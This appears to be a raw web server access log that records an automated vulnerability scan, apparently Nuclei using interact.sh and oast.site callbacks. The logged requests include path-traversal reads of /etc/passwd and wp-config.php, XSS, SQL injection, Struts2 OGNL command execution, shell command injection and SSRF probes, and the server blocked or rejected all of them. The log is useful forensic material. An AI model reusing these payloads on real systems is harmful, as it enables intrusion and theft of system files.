[26/Nov/2024:18:06:32 +0800] "GET /phpmyadmin_072759e42b81c829/themes/pmahomme/img/b_plugin.png HTTP/1.1" 200 512 "-" "BT-Panel" 127.0.0.1 - - [26/Nov/2024:18:06:32 +0800] "GET /phpmyadmin_072759e42b81c829/themes/pmahomme/img/b_engine.png HTTP/1.1" 200 398 "-" "BT-Panel" 127.0.0.1 - - [26/Nov/2024:18:06:32 +0800] "GET /phpmyadmin_072759e42b81c829/themes/pmahomme/img/s_top.png HTTP/1.1" 200 220 "-" "BT-Panel" 127.0.0.1 - - [26/Nov/2024:18:06:32 +0800] "GET /phpmyadmin_072759e42b81c829/themes/pmahomme/img/s_asci.png HTTP/1.1" 200 148 "-" "BT-Panel" 87.236.176.239 - - [26/Nov/2024:19:31:56 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 47.250.81.129 - - [27/Nov/2024:05:02:57 +0800] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03I\x06\xB2\xF9\xBC\x99i\xC0Y\xFB\xF8\xBAe-\x83Ud]\x0E\x8D\xB7b8\xB4g\xC6\xDD9dZ8f g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD6\xBD\x95g|p\xFC\xE9alert(document.domain)&searchsubmit=Buscar&page=nsp_search HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.7.22" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /openwin.php?redirurl=http://interact.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 172.18.0.4 - - [29/Nov/2024:09:55:48 +0800] "GET /novius-os/admin/nos/login?redirect=http://interact.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36,gzip(gfe)" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "POST /login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15,gzip(gfe)" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /CMSPages/GetDocLink.ashx?link=https://interact.sh/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15242.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "PUT /_snapshot/test HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "POST /cgibin/webproc HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.41" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "PUT /_snapshot/test2 HTTP/1.1" 405 150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /Umbraco/feedproxy.aspx?url=http://ct4hu7d65jrdcfcsg340a8hyg1n5b8qa7.oast.site HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.76" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 172.18.0.4 - admin [29/Nov/2024:09:55:49 +0800] "GET /system/console?.css HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15225.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /?author=1 HTTP/1.1" 403 146 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/604.1.28 (KHTML, like Gecko) Version/9.1.2 Safari/604.1.28" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1474.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 OPX/1.7.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4464.0 Safari/537.36 Edg/91.0.852.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "POST /boardDataWW.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0" 172.18.0.4 - - [29/Nov/2024:09:55:49 +0800] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /login?redir=http://www.interact.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:40.0) Gecko/20100101 Firefox/40.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /?redirect=/\x5Cinteract.sh HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /DnnImageHandler.ashx?mode=file&url=http://ct4hu7d65jrdcfcsg340dg6zba6nku547.oast.site HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/627.33.6 (KHTML, like Gecko) Version/10.1.65 Safari/627.33.6" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /command/prima-factory.cgi HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.16" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /fileserver/2pVJVpvX0MMolyqRC8wvZkRJFrS.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.41" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:109.0) Gecko/20100101 Firefox/109.0/OcuCYEWlLXKFzoT" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /cgi-bin/logoff.cgi HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.6.21" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "PUT /fileserver/2pVJVpvX0MMolyqRC8wvZkRJFrS.txt HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.50" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /BSW_cxttongr.htm HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /__debugging_center_utils___.php?log=;echo%20krwcztinpnkwjdcxzwlbblnpbrzwciic%20|%20id HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /__debugging_center_utils___.php?log=;echo%20krwcztinpnkwjdcxzwlbblnpbrzwciic%20|%20ipconfig HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:109.0) Gecko/20100101 Firefox/109.0/OcuCYEWlLXKFzoT" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.41" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/123.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /services/getFile.cmd?userfile=config.xml HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /%5C../ssl/yaws-key.pem HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:35.0) Gecko/20100101 Firefox/35.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%273571646637%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15242.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /fosagent/repl/download-file?basedir=4&filepath=..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.8.15" 172.18.0.4 - - [29/Nov/2024:09:55:50 +0800] "GET /fosagent/repl/download-snapshot?name=..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 0.4.4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15241.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%2